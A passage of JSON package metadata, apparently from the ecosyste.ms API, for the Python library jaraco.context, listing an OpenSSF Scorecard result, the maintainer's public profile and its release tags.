pos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"jaraco","name":"Jason R. Coombs","uuid":"308610","kind":"user","description":"","email":"jaraco@jaraco.com","website":"https://www.jaraco.com","location":"Pittsburgh, PA, USA","twitter":"jaraco","company":null,"icon_url":"https://avatars.githubusercontent.com/u/308610?u=5b3fdef94d1b0ac7392d17643eaba029f5f13bea\u0026v=4","repositories_count":233,"last_synced_at":"2026-08-06T04:39:36.850Z","metadata":{"has_sponsors_listing":true,"funding":null},"html_url":"https://github.com/jaraco","funding_links":["https://github.com/sponsors/jaraco"],"total_stars":5439,"followers":746,"following":5,"created_at":"2022-11-02T16:21:31.721Z","updated_at":"2026-08-06T04:39:37.156Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco/repositories"},"tags":[{"name":"v6.1.2","sha":"098f39c911d4504b2c718f2ff483ae24f1c4d378","kind":"tag","published_at":"2026-03-20T22:10:56.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2/manifests"},{"name":"v6.1.1","sha":"47979d7b6a55353170f61f3e54d17f5973cb8e1c","kind":"tag","published_at":"2026-03-07T15:43:22.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1/manifests"},{"name":"v6.1.0","sha":"675aaf5bfb926bdafcded1b0e08ca011d6e0f599","kind":"tag","published_at":"2026-01-13T02:49:19.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0/manifests"},{"name":"v6.0.2","sha":"1fe5de1e450556cc68d1d33198f8c7b8791af42d","kind":"tag","published_at":"2025-12-24T19:18:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2/manifests"},{"name":"v6.0.1","sha":"088151eb92eaf8801d027e126d4f7a262e422424","kind":"tag","published_at":"2024-08-20T03:35:36.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1/manifests"},{"name":"v6.0.0","sha":"d892f531d6707f46ef1981f5ca7a7309ed4d3005","kind":"tag","published_at":"2024-07-26T21:08:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0/manifests"},{"name":"v5.3.0","sha":"e0e9224b3dbe6520c986bf41820f882160dd55ab","kind":"tag","published_at":"2024-04-06T22:57:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0/manifests"},{"name":"v5.2.0","sha":"c23c888c869bfb693246f69ba512aaede5b0438b","kind":"tag","published_at":"2024-04-06T14:42:52.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"0a1e1492aef2455f60f9b4f364551f0b4926da41","kind":"tag","published_at":"2024-04-04T23:18:01.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"eb865a132d3f801335f8b46b4de2d64d4e16e4b4","kind":"tag","published_at":"2024-04-04T18:56:02.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0/manifests"},{"name":"v4.3.0","sha":"0e0ae08919b984e3c7cffdb2106e437d0d0891c8","kind":"tag","published_at":"2023-01-19T15:28:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"7e22446a66f13140c0cfc7df3f36c162f11f3b5a","kind":"tag","published_at":"2023-01-18T18:06:43.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"5bf0042ef434aa8924a771a405ae29e4c0110c1e","kind":"tag","published_at":"2022-11-19T03:06:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0/manifests"},{"name":"v4.1.2","sha":"c3a9b7393ed9479dab7b02a44242ae2b017c4933","kind":"tag","published_at":"2022-07-14T05:04:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"4d09b48ade8acc32e3453da928ad1eec5158a5a0","kind":"tag","published_at":"2021-10-31T17:18:09.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"866a1b35d416ca6855f2d068072af53cbf255cc3","kind":"tag","published_at":"2021-10-31T17:08:46.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0/manifests"},{"name":"v4.0.0","sha":"23d17bf1f04b83ef34c8cd0e67d26c2e323f5a58","kind":"tag","published_at":"2021-01-29T02:38:28.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"e2bb8bd3fe8b3b3ed4a50c4a9f4f1998739bf276","kind":"tag","published_at":"2020-01-10T08:35:45.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v3.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0/manifests"},{"name":"2.0","sha":"105f81a6204d3a9fbb848675d62be4ef185f36f2","kind":"tag","published_at":"2019-01-01T15:40:50.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0/manifests"},{"name":"1.8","sha":"193b5a60581b5a63c3d955e002319f114f9a7c8b","kind":"tag","published_at":"2018-11-08T16:42:27.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.8","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8/manifests"},{"name":"1.7","sha":"d7866113d8d79a541c1f87e2eae975d23d2500ba","kind":"tag","published_at":"2017-11-28T19:27:39.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.7","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7/manifests"},{"name":"1.6.1","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:32:35.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1/manifests"},{"name":"1.6","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:19:34.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6/manifests"},{"name":"1.5.2","sha":"9660d84625f7d27f47f23bd33a1e88c6c59c5384","kind":"commit","published_at":"2015-10-30T15:02:08.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2/manifests"},{"name":"1.5.1","sha":"51add8c320bb1869d339ddb5d3e0b0df5185b431","kind":"commit","published_at":"2015-10-30T15:02:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1/manifests"},{"name":"1.5","sha":"df1e66e6ff30ee0622b1eb822a4d2ba1663b4ba5","kind":"commit","published_at":"2015-10-30T13:32:37.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5/manifests"},{"name":"1.4","sha":"41a57fcc069952a9925b0ac44d66317d679b8e01","kind":"commit","published_at":"2015-10-30T12:59:05.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.4","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4/manifests"},{"name":"1.3","sha":"89a04a5a4b02f92546eb2bc2bd254dabbd148359","kind":"commit","published_at":"2015-02-22T20:18:53.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.3","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3/manifests"},{"name":"1.2","sha":"a3363e1918bab3d2b260179f229706296509c1c0","kind":"commit","published_at":"2015-02-16T00:58:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2/manifests"},{"name":"1.1","sha":"115a8978616e766daace2e0cd50c5db437f3785e","kind":"commit","published_at":"2014-06-17T18:32:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1/manifests"},{"name":"1.0","sha":"d5be3e1a933b97068f31930f3eeb210895d145e9","kind":"commit","published_at":"2014-02-16T08:42:48.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0/manifests"}]},"repo_metadata_updated_at":"2026-08-06T19:26:18.772Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-jaraco.context?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.20","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-jaraco.context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-jaraco.context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-jaraco.context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context","https://github.com/sponsors/jaraco"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.38